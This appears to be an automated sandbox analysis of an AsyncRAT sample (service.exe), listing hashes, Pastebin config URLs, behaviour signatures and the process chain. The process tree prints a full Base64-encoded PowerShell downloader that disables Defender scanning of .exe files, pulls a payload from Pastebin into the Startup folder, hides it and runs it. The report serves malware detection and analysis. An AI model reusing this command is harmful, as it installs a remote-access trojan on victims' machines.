Analysis
-
max time kernel
82s -
max time network
108s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
17/03/2023, 06:47
Static task
static1
General
-
Target
service.exe
-
Size
237KB
-
MD5
2941d6fca94a537479d4d2a12c8a0ed2
-
SHA1
6c8d05a2aefec10e7257fcbb2da8dfa822aacc1c
-
SHA256
087427c0b74d495483859b7e587ef1063529253a2490c892d09f04465ef4f2c0
-
SHA512
e04fc8b6ea6a36cd67a841dda96ddefbab77a0fb994f0eb771ff357df40355ca7fad3afa75254dcd8eae0753cc0a478180e6343ba1ca55c7edf82dbbb3851826
-
SSDEEP
3072:r4tWK9YMDbz6fV/NpbnyAGJwhOnQdT1MgvAOdj8MXoiTYfSHw69pJZXAqacHy1lg:m9j76xnImFZ1MmF8QTU/urSiLfTP8yl
Malware Config
Extracted
https://pastebin.com/raw/vNcCt60A
Extracted
asyncrat
0.5.7B
Default
Mutex
-
delay
3
-
install
false
-
install_folder
%AppData%
-
pastebin_config
https://pastebin.com/raw/3Z9zi18j
Signatures
-
Async RAT payload 3 IoCs
resource yara_rule behavioral1/files/0x0008000000023154-199.dat asyncrat behavioral1/files/0x0008000000023154-200.dat asyncrat behavioral1/memory/4056-201-0x0000000000360000-0x0000000000372000-memory.dmp asyncrat -
Blocklisted process makes network request 2 IoCs
flow pid Process 52 4688 powershell.exe 55 4688 powershell.exe -
Downloads MZ/PE file
-
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 5064 attrib.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation service.exe Key value queried \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tmp4DD7.exe powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tmp4DD7.exe attrib.exe -
Executes dropped EXE 1 IoCs
pid Process 4056 tmp4DD7.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings service.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2328 powershell.exe 2328 powershell.exe 4688 powershell.exe 4688 powershell.exe -
Suspicious use of AdjustPrivilegeToken 25 IoCs
description pid Process Token: SeDebugPrivilege 2328 powershell.exe Token: SeDebugPrivilege 4688 powershell.exe Token: SeIncreaseQuotaPrivilege 4688 powershell.exe Token: SeSecurityPrivilege 4688 powershell.exe Token: SeTakeOwnershipPrivilege 4688 powershell.exe Token: SeLoadDriverPrivilege 4688 powershell.exe Token: SeSystemProfilePrivilege 4688 powershell.exe Token: SeSystemtimePrivilege 4688 powershell.exe Token: SeProfSingleProcessPrivilege 4688 powershell.exe Token: SeIncBasePriorityPrivilege 4688 powershell.exe Token: SeCreatePagefilePrivilege 4688 powershell.exe Token: SeBackupPrivilege 4688 powershell.exe Token: SeRestorePrivilege 4688 powershell.exe Token: SeShutdownPrivilege 4688 powershell.exe Token: SeDebugPrivilege 4688 powershell.exe Token: SeSystemEnvironmentPrivilege 4688 powershell.exe Token: SeRemoteShutdownPrivilege 4688 powershell.exe Token: SeUndockPrivilege 4688 powershell.exe Token: SeManageVolumePrivilege 4688 powershell.exe Token: 33 4688 powershell.exe Token: 34 4688 powershell.exe Token: 35 4688 powershell.exe Token: 36 4688 powershell.exe Token: SeDebugPrivilege 4056 tmp4DD7.exe Token: SeDebugPrivilege 4056 tmp4DD7.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 4284 wrote to memory of 2924 4284 service.exe 86 PID 4284 wrote to memory of 2924 4284 service.exe 86 PID 4284 wrote to memory of 2924 4284 service.exe 86 PID 2924 wrote to memory of 2328 2924 WScript.exe 87 PID 2924 wrote to memory of 2328 2924 WScript.exe 87 PID 2924 wrote to memory of 2328 2924 WScript.exe 87 PID 2328 wrote to memory of 4688 2328 powershell.exe 91 PID 2328 wrote to memory of 4688 2328 powershell.exe 91 PID 2328 wrote to memory of 4688 2328 powershell.exe 91 PID 4688 wrote to memory of 5064 4688 powershell.exe 106 PID 4688 wrote to memory of 5064 4688 powershell.exe 106 PID 4688 wrote to memory of 5064 4688 powershell.exe 106 PID 4688 wrote to memory of 4056 4688 powershell.exe 107 PID 4688 wrote to memory of 4056 4688 powershell.exe 107 PID 4688 wrote to memory of 4056 4688 powershell.exe 107 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 5064 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\service.exe"C:\Users\Admin\AppData\Local\Temp\service.exe"1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4284 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\config.vbs"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2924 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Unrestricted -nologo -command .\service.ps13⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2328 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand IAAgACAAIwAtACMAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAjAC0AIwAKACAAIwAtACMAIAAgACAAcwBjAHIAaQBwAHQAIABiAHkAIABhAHYAaQByAG8AbAAgAF4AXwBeACAAIAAgACMALQAjAAoAIAAgACAAIwAtACMAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAjAC0AIwAKAAoAJABWAGEAbAB1AGUAPQBHAGUAdAAtAEMAbwBtAHAAdQB0AGUAcgBJAG4AZgBvAHwAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0AZQB4AHAAYQBuAGQAIABPAHMATgBhAG0AZQAKAGkAZgAgACgAIAAkAFYAYQBsAHUAZQAgAC0AbQBhAHQAYwBoACAAJwAxADAAJwApAAoAewAKACAAZQBjAGgAbwAgACcATgBvAHQAaABpAG4AZwAgAHQAbwAgAGQAbwAhACcACgB9AAoAZQBsAHMAZQBpAGYAIAAoACQAVgBhAGwAdQBlACAALQBtAGEAdABjAGgAIAAnADEAMQAnACkACgB7AAoAIABlAGMAaABvACAAJwBOAG8AdABoAGkAbgBnACAAdABvACAAZABvACEAJwAKAH0ACgBlAGwAcwBlAAoAewAKACAAZQB4AGkAdAAKAH0ACgBTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBFAHgAdABlAG4AcwBpAG8AbgAgACcAZQB4AGUAJwAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAKACQAUABhAHQAaAA9ACgAJwBoAHQAJwArACcAdAAnACsAJwBwAHMAOgAnACsAJwAvAC8AJwArACcAcABhAHMAdABlACcAKwAnAGIAaQBuACcAKwAnAC4AJwArACcAYwBvAG0AJwArACcALwAnACsAJwByAGEAdwAnACsAJwAvACcAKwAnAHYATgBjAEMAdAA2ADAAQQAnACkACgAkAFIAYQB3AD0ASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAJABQAGEAdABoACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwAKACQAUgBhAHcALgBDAG8AbgB0AGUAbgB0AAoAaQBmACAAKAAnAGUAcgByAG8AcgAnACAALQBlAHEAIAAkAFIAYQB3AC4AYwBvAG4AdABlAG4AdAApAAoAewAKACAAZQB4AGkAdAAKAH0ACgAkAE4AdQBtAGIAZQByADEAPQBHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBNAGEAeABpAG0AdQBtACAAJwA5ACcACgAkAE4AdQBtAGIAZQByADIAPQBHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBNAGEAeABpAG0AdQBtACAAJwA5ACcACgAkAFAAYQB0AGgAPQBbAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBHAGUAdABGAG8AbABkAGUAcgBQAGEAdABoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAKwBTAHAAZQBjAGkAYQBsAEYAbwBsAGQAZQByAF0AOgA6AFMAdABhAHIAdAB1AHAAKQAKAEcAZQB0AC0ATABvAGMAYQB0AGkAbwBuAAoAUwBlAHQALQBMAG8AYwBhAHQAaQBvAG4AIAAtAFAAYQB0AGgAIAAkAFAAYQB0AGgACgBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJABSAGEAdwAuAGMAbwBuAHQAZQBuAHQAIAAtAE8AdQB0AEYAaQBsAGUAIAAuAFwAJwBcAHQAbQBwACcAJABOAHUAbQBiAGUAcgAxACcARABEACcAJABOAHUAbQBiAGUAcgAyACcALgBlAHgAZQAnACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwAKAEMAOgBcAD8AaQA/AGQAPwB3AD8AXAA/AHkAPwB0AD8AbQA/ADIAXAA/AHQAPwByAD8AYgAuAD8AeAA/ACAAKwBzACAAKwBoACAALgBcACcAXAB0AG0AcAAnACQATgB1AG0AYgBlAHIAMQAnAEQARAAnACQATgB1AG0AYgBlAHIAMgAnAC4AZQB4AGUAJwAKAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgAC0AQwBvAG0AbQBhAG4AZAAgAC4AXAAnAFwAdABtAHAAJwAkAE4AdQBtAGIAZQByADEAJwBEAEQAJwAkAE4AdQBtAGIAZQByADIAJwAuAGUAeABlACcA4⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4688 -
C:\Windows\SysWOW64\attrib.exe"C:\Windows\System32\attrib.exe" +s +h .\\tmp4DD7.exe5⤵
- Sets file to hidden
- Drops startup file
- Views/modifies file attributes
PID:5064
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tmp4DD7.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tmp4DD7.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4056
-
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5b0e1352991da830009dc09bb0828d1a6
SHA14cf91840883ad57b83558488394721f6e0e19fb7
SHA256be926637ddd5590ee6b7f53451d7644b7db600fc2218edc1427fbbf441297805
SHA512cfdf8a23faead0ccada8f8d7785894c4e79f87a591ea20ca549bfcfc8a85651841a7bb581995f15de964f1e73d4af6d1777c0416272f5caab3f53482eb09f8e6
-
Filesize
11KB
MD55126d77e4bd5acebbcd3fe5e0eed2994
SHA16162f6246273c8c186f482ffea1949b23e00e8b5
SHA256b61fdf2e704710dca27b66df9088995f2c15060283421aa85ec36f0ca4b99cbd
SHA512f9d437527d2827ff6f59985240bfd5dcb4bf7c4a82b766131485a1ac06b7650885dcb2eea153527cf730ba5d79ef80a30425c3f5c00de4840dd6a2f33155a378
-
Filesize
147B
MD5e04e55d2e6cc3d920631fdc5d6dcc1ce
SHA12c4dbcff71f8678623a7c197440ec281804dc5a5
SHA256f641a99ec7e549970c81d724766f2a60ff031a5ec92aa6fc84228c82eeb4b4eb
SHA5129511fe4dc599187f4539b8cda476550c54e86cbfcaca339a5db12e980ec322bf488d7458bf76089aa1d845f164f7ddb8adea017923d9a4930b9e821b7a4ae998
-
Filesize
2KB
MD5e16e049cd254a45e3a5538de04345df1
SHA1120c2ac523b19ba50d7c7e11cf8630ee0b37f104
SHA2567fc7521be2484846088e013b233f34605c526e3a69bc5d026dba76aecbe78973
SHA5120a71e1e43991b055d564fad52f2cef81ec2ec592a6bf0d46311e51b80550b67ae4a495a5a76a19284bc3564559f6e7c03b9af4f887f12433d6c779f779d2a612
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
48KB
MD56b95c5b02a8c31726cab09fc575423d5
SHA1840aedd363c32d13cf8ec14729f68b9e6c31d374
SHA256ec22734717b5451dd8527cf3d564fe450d2a12523e5ec880b9d8c60345f762b9
SHA512f6eeb9d5b44617103d96662311db7e483d5c1b7be849d8e99a9d9284dce830d7fcedaf4247d3e45e1823d27ed8ea6df328596744b6ee2de98ccfee0f36f5fb40
-
Filesize
48KB
MD56b95c5b02a8c31726cab09fc575423d5
SHA1840aedd363c32d13cf8ec14729f68b9e6c31d374
SHA256ec22734717b5451dd8527cf3d564fe450d2a12523e5ec880b9d8c60345f762b9
SHA512f6eeb9d5b44617103d96662311db7e483d5c1b7be849d8e99a9d9284dce830d7fcedaf4247d3e45e1823d27ed8ea6df328596744b6ee2de98ccfee0f36f5fb40